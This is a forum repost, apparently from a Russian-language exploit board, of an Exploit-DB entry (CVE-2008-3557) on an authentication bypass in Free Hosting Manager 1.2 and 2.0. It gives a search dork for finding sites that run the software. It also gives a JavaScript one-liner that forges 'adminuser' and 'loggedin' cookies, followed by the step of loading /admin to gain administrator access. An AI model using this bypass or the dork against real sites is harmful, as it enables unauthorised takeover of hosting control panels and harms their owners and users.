Exploit Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6213
Проверка EDB
  1. Пройдено
Автор
SCARY-BOYS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-3557
Дата публикации
2008-08-06
Код:
#########################################################################
#                                                                       #
#Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability#
#                                                                       #
#########################################################################
#                                                                       #
# AUTHOR     : Scary-Boys                                               #
# HOME       : http://scary-boys.com                                    #
# Founded By : lvlr-Erfan                                               #
# Download   : http://www.fhm-script.com/download.php                   #
#                                                                       #
#########################################################################
#                                                                       #
#     DorKs  : "Powered By Free Hosting Manager"                        #
#                                                                       #
#########################################################################
#                                                                       #
#  DESCRIPTION :                                                        #
# the admin panel only checks if the cookie exists.                     #
#                                                                       #
#########################################################################
#                                                                       #
#  Vulnerability :                                                      #
#                                                                       #
#  javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";
#                                                                       #
#########################################################################
#                                                                       #
# after running the javascript, Go to "/admin" & Refresh      #
#                                                                       #
#########################################################################

# milw0rm.com [2008-08-06]
 
Источник
www.exploit-db.com

Похожие темы